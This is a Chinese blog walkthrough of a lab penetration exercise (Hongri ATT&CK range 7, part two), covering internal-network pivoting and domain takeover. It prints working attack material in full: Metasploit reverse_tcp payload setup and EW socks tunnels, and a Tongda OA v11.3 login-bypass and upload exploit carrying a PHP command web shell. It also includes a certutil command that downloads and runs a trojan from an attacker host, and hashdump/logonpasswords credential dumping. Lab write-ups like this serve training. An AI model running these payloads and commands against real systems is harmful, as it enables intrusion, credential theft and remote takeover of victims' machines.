红日ATT&CK实战系列七(下)

admin 2024年1月16日17:50:43评论70 views字数 3002阅读10分0秒阅读模式

免责声明:涉及到的所有技术和工具仅用来学习交流,严禁用于非法用途,未经授权请勿非法渗透,否则产生的一切后果自行承担!

接上文之后,接下来我们进行内网渗透。

3、内网渗透

一、msf上线  

首先上线web1

use exploit/multi/script/web_delivery            set target 7    # 选择目标系统            set payload linux/x64/meterpreter/reverse_tcp            set lhost 192.168.43.177            set lport 1111            run    

红日ATT&CK实战系列七(下)

更改端口上线web2    

红日ATT&CK实战系列七(下)

sessions查看上线的机器    

红日ATT&CK实战系列七(下)

目前拿下了web1和web2

二、路由与socks5代理  

我们目前拥有两个sessions,但是kali无法访问52网段的主机,所以我们需要在web1上增加一个通往192.168.52.0的路由

route add 目标网段 子网掩码 sessions号

路由转发只能将msf带进内网,kali想要将其他攻击程序带进内网还得搭建socks代理,这里前面有点小意外,重新上线了一下web1    

红日ATT&CK实战系列七(下)

目前sessions 4 为web2 ,sessions 5 为web1

继续搭建代理

首先在kali执行

ufw allow 12345            ./ew_for_linux64 -s rcsocks -l 1080 -e 12345

将ew_for_linux64上传给web1

upload /root/ew-master/ew_for_linux64

在web1上执行    

./ew_for_linux64 -s rssocks -d 192.168.43.177 -e 12345

红日ATT&CK实战系列七(下)    

红日ATT&CK实战系列七(下)

搭建好后配置kali的proxychains,将socks5服务器指向127.0.0.1:1080,之后就可以使用proxychains将我们攻击机上的程序代理进第二层网络(52网段)了

vim /etc/proxychains4.conf            socks5 127.0.0.1 1080    

红日ATT&CK实战系列七(下)

三、cs上线  

使用auxliary/scanner/discovery/udp_probe 模块来扫描第二层网络中存活的主机

set rhosts 192.168.52.1-255            set threads 5            run

发现30主机,进行30主机的端口扫描

proxychains4 nmap -Pn -sT -sV -F -O 192.168.52.30    

红日ATT&CK实战系列七(下)

发现8080端口存在nginx的http服务,在攻击机设置好代理访问    

红日ATT&CK实战系列七(下)

发现是通达OA v11.3 该版本存在任意用户登录、文件包含、文件上传等多个漏洞

抓包    

红日ATT&CK实战系列七(下)

发送到Repeater,修改三个点

1、修改/logincheck.php为/logincheck_code.php            2、删除cookie            3、在encode_type后加&UID=1

重发后得到新的SESSION,拼接/general访问抓包修改session即可

然后访问

http://ip/general/index.php?is_modify_pwd=1

红日ATT&CK实战系列七(下)

登陆成功后抓包修改内容为

POST /ispirit/im/upload.php HTTP/1.1            Host: 192.168.52.30:8080            Content-Length: 656            Cache-Control: no-cache            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36            Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB            Accept: */*            Accept-Encoding: gzip, deflate            Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5            Cookie: PHPSESSID=123            Connection: close            ------WebKitFormBoundarypyfBh1YB4pV8McGB            Content-Disposition: form-data; name="UPLOAD_MODE"            2            ------WebKitFormBoundarypyfBh1YB4pV8McGB            Content-Disposition: form-data; name="P"            123            ------WebKitFormBoundarypyfBh1YB4pV8McGB            Content-Disposition: form-data; name="DEST_UID"            1            ------WebKitFormBoundarypyfBh1YB4pV8McGB            Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"            Content-Type: image/jpeg            $command=$_POST['cmd'];            $wsh = new COM('WScript.shell');            $exec = $wsh->exec("cmd /c ".$command);            $stdout = $exec->StdOut();            $stroutput = $stdout->ReadAll();            echo $stroutput;            ?>            ------WebKitFormBoundarypyfBh1YB4pV8McGB--

红日ATT&CK实战系列七(下)

出现图片马的路径,文件包含图片马

红日ATT&CK实战系列七(下)

POST /ispirit/interface/gateway.php HTTP/1.1            Host: 192.168.52.30:8080            Connection: keep-alive            Accept-Encoding: gzip, deflate            Accept: */*            User-Agent: python-requests/2.21.0            Content-Length: 70            Content-Type: application/x-www-form-urlencoded            json={"url":"/general/../../attach/im/2102/96964187.jpg"}&cmd=whoami

使用cs生成木马运行上线cs

红日ATT&CK实战系列七(下)

红日ATT&CK实战系列七(下)

将生成的木马放入kali,并在同目录开启http服务

python3 -m http.server 端口

红日ATT&CK实战系列七(下)

连接sessions1 远程下载木马,然后再次开启http服务

红日ATT&CK实战系列七(下)

在burpsuit中刚才whoami的地方替换为下载命令,远程从web1上下载木马

certutil.exe -urlcache -split -f http://192.168.52.10:1008/5.exe

红日ATT&CK实战系列七(下)

下载成功后运行木马即可上线cs

红日ATT&CK实战系列七(下)

红日ATT&CK实战系列七(下)

拿到后进行信息收集内网穿刺,目标发现和密码抓取

net view            hash dump            logonpasswords

红日ATT&CK实战系列七(下)

收集好了以后发现了30和40两台机器,其中发现DC为30

新建一个SMB的监听器

红日ATT&CK实战系列七(下)

然后进行横向拓展

红日ATT&CK实战系列七(下)

选择目标列表,选择自己要横向移动的机器,右键选择jump->psexec

红日ATT&CK实战系列七(下)

红日ATT&CK实战系列七(下)

选择最后一条administrator,选择smb监听器以及刚才上线的session

就可以得到93.30这台DC,同样的方法拿下PC2

红日ATT&CK实战系列七(下)

红日ATT&CK实战系列七(下)

红日ATT&CK实战系列七(下)

红日ATT&CK实战系列七(下)

至此拿下所有机器!

原文始发于微信公众号(智检安全):红日ATT&CK实战系列七(下)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月16日17:50:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红日ATT&CK实战系列七(下)https://cn-sec.com/archives/2399207.html

发表评论

匿名网友 填写信息